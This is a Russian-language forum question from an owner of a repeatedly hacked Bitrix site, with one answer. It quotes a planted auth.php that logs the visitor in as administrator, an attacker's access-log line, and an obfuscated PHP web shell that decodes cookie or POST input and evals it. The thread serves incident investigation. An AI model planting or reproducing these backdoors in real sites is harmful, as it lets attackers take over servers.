bioid
@bioid

Что делает (или позволяет делать) файл auth.php в битре?

Содержимое файла:
<?                                                                                                                                                                                             

require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
$USER->Authorize(1);

?>

Содержимое файла prolog_before.php
<?                                                                                                                                                                                             
define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(dirname(__FILE__)."/../include.php");

CMain::PrologActions();
?>


Пытаюсь начать разобираться что регулярно ломает богом забытый сайт на php7.3. Что-то плодит файлы и их эксплуатирует, насколько понимаю.
Например вот access лог из nginx.
79.137.207.224 - - [02/Mar/2024:11:06:48 +0300] "POST /bitrix/admin/0cf4a32718c2.php HTTP/1.1" 200 23491 "-" "curl/7.86.0"

Файлы с содержимым типа:
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["m\x79\x70\x61c\x63\x73\x76"]="\x5f1";${"\x47\x4cOBAL\x53"}["h\x6fq\x70\x75\x73p\x67l\x73v"]="\x5f\x30";$GLOBALS["\x5f1\x371515\x319\x31_"]=Array("str\x5f"."ro\x741\x33","\x70\x61\x63\x6b","\x73\x74"."r\x72\x65\x76");function _1178619035($i){$rymhgnsq="\x61";$ijkxdjo="a";$ibnyrutvve="\x69";${$rymhgnsq}=Array("jwe\x79c","aesko\x6cy","\x6fwhg\x67i\x6b\x75","c\x61l\x6c\x62r\x68y","H*");return${$ijkxdjo}[${$ibnyrutvve}];}function l__0($_0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x6f\x67\x75x\x69\x72\x70\x69"]="\x5f\x30";return isset($_COOKIE[${${"GLO\x42\x41\x4c\x53"}["\x68oq\x70\x75s\x70\x67\x6c\x73\x76"]}])?$_COOKIE[${${"G\x4c\x4fB\x41\x4c\x53"}["\x6do\x67u\x78i\x72\x70i"]}]:@$_POST[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x6f\x71p\x75sp\x67\x6c\x73\x76"]}];}${${"\x47L\x4f\x42\x41\x4c\x53"}["m\x79\x70\x61c\x63s\x76"]}=l__0(_1178619035(0)).l__0(_1178619035(1)).l__0(_1178619035(2)).l__0(_1178619035(3));if(!empty(${${"\x47L\x4fBA\x4c\x53"}["\x6d\x79p\x61\x63\x63s\x76"]})){${${"\x47L\x4fB\x41\x4c\x53"}["\x6d\x79\x70acc\x73\x76"]}=$GLOBALS["_\x317\x315\x31\x35\x3191\x5f"][0](@$GLOBALS["_\x31715\x3151\x391\x5f"][1](_1178619035(4),$GLOBALS["_\x3171\x3515\x319\x31\x5f"][2](${${"\x47\x4c\x4f\x42AL\x53"}["m\x79\x70\x61\x63c\x73\x76"]})));if(isset(${${"\x47\x4c\x4f\x42AL\x53"}["\x6d\x79\x70\x61\x63\x63s\x76"]})){@eval(${${"G\x4c\x4f\x42\x41L\x53"}["\x6d\x79pac\x63s\x76"]});exit();}}                                                                                                  
?>
  • Вопрос задан
  • 380 просмотров
Решения вопроса 1
@koder_1
Битрикс программист
Если открыть в браузере этот auth.php то станете админом, соответственно можно закинуть на сайт любые файлы и делать в админке что угодно.

plolog_before.php это системный файл битрикс, если кратко, его включение делает возможным использовать функции из ядра Битрикс.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы